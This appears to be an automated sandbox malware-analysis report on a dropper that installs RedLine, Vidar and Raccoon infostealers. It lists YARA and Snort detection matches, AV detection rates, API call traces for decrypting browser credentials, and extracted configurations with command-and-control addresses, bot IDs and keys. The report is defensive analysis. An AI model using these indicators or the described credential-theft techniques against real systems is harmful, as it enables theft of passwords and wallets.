21.0.namdoitntn.exe.9f0000.0.unpack	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x13701:$a1: get_encrypted_key 0x12e03:$a2: get_PassedPaths 0x1182a:$a3: ChromeGetLocalName 0x13004:$a4: GetBrowsers 0x19a28:$a5: Software\Valve\SteamLogin Data 0x192c8:$a6: %appdata%\ 0x12b28:$a7: ScanPasswords
26.0.brokerius.exe.b60000.0.unpack	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x39138:$a2: wallet.dat 0x395c1:$b1: CC\%s_%s.txt 0x392c9:$b2: History\%s_%s.txt 0x392b5:$b3: Autofill\%s_%s.txt
23.0.real.exe.d0000.0.unpack	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x39138:$a2: wallet.dat 0x395c1:$b1: CC\%s_%s.txt 0x392c9:$b2: History\%s_%s.txt 0x392b5:$b3: Autofill\%s_%s.txt
26.2.brokerius.exe.b60000.0.unpack	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x39138:$a2: wallet.dat 0x395c1:$b1: CC\%s_%s.txt 0x392c9:$b2: History\%s_%s.txt 0x392b5:$b3: Autofill\%s_%s.txt
15.2.F0geI.exe.400000.0.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
15.3.F0geI.exe.2090000.0.raw.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
29.0.me.exe.cf0000.0.unpack	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x38f14:$a2: wallet.dat 0x393a1:$b1: CC\%s_%s.txt 0x390a5:$b2: History\%s_%s.txt 0x39091:$b3: Autofill\%s_%s.txt
15.2.F0geI.exe.400000.0.raw.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
24.0.safert44.exe.fa0000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1c60:$pat14: , CommandLine: 0x25b6b:$v2_1: ListOfProcesses 0x25920:$v4_3: base64str 0x265de:$v4_4: stringKey 0x23fa6:$v4_5: BytesToStringConverted 0x23080:$v4_6: FromBase64 0x24537:$v4_8: procName 0x24867:$v5_1: DownloadAndExecuteUpdate 0x257f7:$v5_2: ITaskProcessor 0x24855:$v5_3: CommandLineUpdate 0x24846:$v5_4: DownloadUpdate 0x24cbd:$v5_5: FileScanning 0x241cd:$v5_7: RecordHeaderField 0x23e0e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
24.0.safert44.exe.fa0000.0.unpack	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x26610:$a1: get_encrypted_key 0x25cb8:$a2: get_PassedPaths 0x245af:$a3: ChromeGetLocalName 0x25ec9:$a4: GetBrowsers 0x19f0:$a5: Software\Valve\SteamLogin Data 0x1290:$a6: %appdata%\ 0x259b4:$a7: ScanPasswords
25.0.jshainx.exe.a90000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
25.0.jshainx.exe.a90000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x19ca8:$pat14: , CommandLine: 0x12ccd:$v2_1: ListOfProcesses 0x12a8d:$v4_3: base64str 0x136d1:$v4_4: stringKey 0x1033a:$v4_6: FromBase64 0x117b2:$v4_8: procName 0x11ac8:$v5_1: DownloadAndExecuteUpdate 0x12964:$v5_2: ITaskProcessor 0x11ab6:$v5_3: CommandLineUpdate 0x11aa7:$v5_4: DownloadUpdate 0x11eab:$v5_5: FileScanning 0x11460:$v5_7: RecordHeaderField
25.0.jshainx.exe.a90000.0.unpack	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x13703:$a1: get_encrypted_key 0x12dfc:$a2: get_PassedPaths 0x1182a:$a3: ChromeGetLocalName 0x13006:$a4: GetBrowsers 0x19a38:$a5: Software\Valve\SteamLogin Data 0x192d8:$a6: %appdata%\ 0x12b21:$a7: ScanPasswords
18.2.kukurzka9000.exe.400000.0.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
15.3.F0geI.exe.2090000.0.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
0.3.9n6ctoq7cn.exe.2a0d014.0.unpack	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x38314:$a2: wallet.dat 0x387a1:$b1: CC\%s_%s.txt 0x384a5:$b2: History\%s_%s.txt 0x38491:$b3: Autofill\%s_%s.txt
15.2.F0geI.exe.2080e67.4.raw.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
23.2.real.exe.d0000.0.unpack	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x39138:$a2: wallet.dat 0x395c1:$b1: CC\%s_%s.txt 0x392c9:$b2: History\%s_%s.txt 0x392b5:$b3: Autofill\%s_%s.txt
29.2.me.exe.cf0000.0.unpack	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x38f14:$a2: wallet.dat 0x393a1:$b1: CC\%s_%s.txt 0x390a5:$b2: History\%s_%s.txt 0x39091:$b3: Autofill\%s_%s.txt
0.3.9n6ctoq7cn.exe.2a0d014.0.raw.unpack	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x38f14:$a2: wallet.dat 0x393a1:$b1: CC\%s_%s.txt 0x390a5:$b2: History\%s_%s.txt 0x39091:$b3: Autofill\%s_%s.txt
39.2.SETUP_~1.EXE.38a9510.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Click to see the 23 entries

Snort Signatures

ET TROJAN Win32/RecordBreaker - Observed UA M1 - Source IP: 192.168.2.3 - Destination IP: 45.95.11.158

Timestamp:	192.168.2.345.95.11.15849827802038485 08/23/22-18:23:55.732951
SID:	2038485
Source Port:	49827
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/RecordBreaker - Library Request - Source IP: 192.168.2.3 - Destination IP: 45.95.11.158

Timestamp:	192.168.2.345.95.11.15849827802038487 08/23/22-18:24:01.340150
SID:	2038487
Source Port:	49827
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/RecordBreaker - Observed UA M2 - Source IP: 192.168.2.3 - Destination IP: 45.95.11.158

Timestamp:	192.168.2.345.95.11.15849827802038486 08/23/22-18:24:01.340150
SID:	2038486
Source Port:	49827
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response - Source IP: 45.95.11.158 - Destination IP: 192.168.2.3

Timestamp:	45.95.11.158192.168.2.380498272036955 08/23/22-18:23:55.913354
SID:	2036955
Source Port:	80
Destination Port:	49827
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/RecordBreaker CnC Checkin M1 - Source IP: 192.168.2.3 - Destination IP: 45.95.11.158

Timestamp:	192.168.2.345.95.11.15849827802036934 08/23/22-18:23:55.732951
SID:	2036934
Source Port:	49827
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://62.204.41.126:80

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Avira: detection malicious, Label: HEUR/AGEN.1251247
Source: C:\Program Files (x86)\Company\NewProduct\me.exe	Avira: detection malicious, Label: HEUR/AGEN.1250598
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	Avira: detection malicious, Label: HEUR/AGEN.1250598
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	Avira: detection malicious, Label: HEUR/AGEN.1250598
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Avira: detection malicious, Label: HEUR/AGEN.1203016
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Avira: detection malicious, Label: HEUR/AGEN.1251247

Multi AV Scanner detection for submitted file

Source: 9n6ctoq7cn.exe

Virustotal: Detection: 56%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Metadefender: Detection: 64%	Perma Link
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	ReversingLabs: Detection: 96%
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	ReversingLabs: Detection: 57%
Source: C:\Program Files (x86)\Company\NewProduct\captain09876.exe	Metadefender: Detection: 36%	Perma Link
Source: C:\Program Files (x86)\Company\NewProduct\captain09876.exe	ReversingLabs: Detection: 38%
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Metadefender: Detection: 45%	Perma Link
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	ReversingLabs: Detection: 43%
Source: C:\Program Files (x86)\Company\NewProduct\me.exe	ReversingLabs: Detection: 41%
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	ReversingLabs: Detection: 87%
Source: C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe	Metadefender: Detection: 45%	Perma Link
Source: C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe	ReversingLabs: Detection: 42%
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	ReversingLabs: Detection: 80%

Machine Learning detection for sample

Source: 9n6ctoq7cn.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Company\NewProduct\me.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe	Joe Sandbox ML: detected

Source: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Raccoon {"C2 url": ["http://45.95.11.158/"], "Bot ID": "76426c3f362f5a47a469f0e9d8bc3eef", "RC4_key1": "76426c3f362f5a47a469f0e9d8bc3eef"}
Source: 21.0.namdoitntn.exe.9f0000.0.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["103.89.90.61:34589"], "Bot Id": "nam3", "Message": "Done", "Authorization Header": "64b900120bbceaa6a9c60e9079492895"}

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_00403236 LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,CopyFileW,CopyFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,LocalFree,LocalFree,DeleteFileW,LocalFree,	15_2_00403236
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_004027B8 LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,CopyFileW,CopyFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,LocalFree,LocalFree,DeleteFileW,LocalFree,	15_2_004027B8
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_00402CB8 LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,LocalFree,CryptUnprotectData,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,CopyFileW,CopyFileW,DeleteFileW,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,LocalAlloc,lstrcmp,LocalAlloc,lstrcmpW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,CryptUnprotectData,lstrcmpW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,	15_2_00402CB8
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_00406468 LocalAlloc,CryptStringToBinaryA,lstrlen,CryptStringToBinaryA,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,StrCpyW,LocalFree,StrCpyW,StrCpyW,LocalFree,	15_2_00406468
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_004017FA CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,	15_2_004017FA
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_0040177F CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,StrCpyW,LocalFree,LocalFree,	15_2_0040177F
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_00406468 LocalAlloc,CryptStringToBinaryA,lstrlen,CryptStringToBinaryA,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,StrCpyW,LocalFree,StrCpyW,StrCpyW,LocalFree,	18_2_00406468
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_004017FA CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,	18_2_004017FA
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_0040177F CryptBinaryToStringW,LocalAlloc,VirtualAlloc,CryptBinaryToStringW,StrCpyW,LocalFree,LocalFree,	18_2_0040177F
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_00403236 LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,CopyFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,LocalFree,LocalFree,DeleteFileW,LocalFree,	18_2_00403236
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_004027B8 LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,CopyFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,LocalFree,LocalFree,DeleteFileW,LocalFree,	18_2_004027B8
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_00402CB8 LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,LocalFree,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,CopyFileW,DeleteFileW,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,lstrcmpW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,CryptUnprotectData,lstrcmpW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,	18_2_00402CB8

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Unpacked PE file: 15.2.F0geI.exe.400000.0.unpack
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Unpacked PE file: 18.2.kukurzka9000.exe.400000.0.unpack

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Program Files (x86)\Company\NewProduct\real.exe	Unpacked PE file: 23.2.real.exe.60900000.1.unpack
Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	Unpacked PE file: 26.2.brokerius.exe.60900000.1.unpack

Source: 9n6ctoq7cn.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.22.0.232:443 -> 192.168.2.3:49924 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49925 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49938 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\GoogleUpdater

Jump to behavior

Source:	Binary string: wextract.pdb source: captain09876.exe, 0000001B.00000002.691425117.00007FF614759000.00000002.00000001.01000000.0000000E.sdmp, captain09876.exe, 0000001B.00000000.398986208.00007FF614759000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: wextract.pdbGCTL source: captain09876.exe, 0000001B.00000002.691425117.00007FF614759000.00000002.00000001.01000000.0000000E.sdmp, captain09876.exe, 0000001B.00000000.398986208.00007FF614759000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: C:\wiroguzaxun\lefereyocimuwu-fep\22\wipo\57_so.pdb source: F0geI.exe, 0000000F.00000000.354739075.0000000000401000.00000020.00000001.01000000.00000004.sdmp
Source:	Binary string: C:\Soboya xola sikine\nalac\Lohoc\Docamap.pdb source: 9n6ctoq7cn.exe
Source:	Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.15.dr

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe

Code function: 15_2_0040ABD8 LocalAlloc,LocalFree,LocalAlloc,GetLogicalDriveStringsW,GetLogicalDriveStringsW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,

15_2_0040ABD8

Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_004052DA LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,	15_2_004052DA
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_00405B5B LocalAlloc,StrCpyW,lstrlenW,FindFirstFileW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,StrRChrW,StrCpyW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,GetFileSize,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindNextFileW,LocalFree,FindClose,	15_2_00405B5B
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_0040196E FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,StrStrW,StrStrW,LocalAlloc,PathCombineW,lstrlenW,	15_2_0040196E
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_0040B177 LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,DeleteFileW,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,FindNextFileW,LocalFree,FindClose,	15_2_0040B177
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_00401B05 FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,PathCombineW,LocalFree,lstrlenW,FindNextFileW,FindNextFileW,FindClose,	15_2_00401B05
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_0040AE06 LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrcmpW,StrCpyW,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalFree,lstrcmpW,lstrcmpW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrlenW,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindNextFileW,LocalFree,LocalFree,FindClose,	15_2_0040AE06
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_00403C8F StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	15_2_00403C8F
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_00401E18 LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,PathCombineW,StrCpyW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,wsprintfW,PathCombineW,FindFirstFileW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	15_2_00401E18
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_0040633E FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,lstrlenW,	15_2_0040633E
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_004039D7 LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,	15_2_004039D7
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_00406725 LocalAlloc,StrCpyW,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,LocalAlloc,LocalAlloc,StrCpyW,StrCpyW,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,	15_2_00406725
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_004039D7 LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,	18_2_004039D7
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_004052DA LocalAlloc,StrCpyW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,	18_2_004052DA
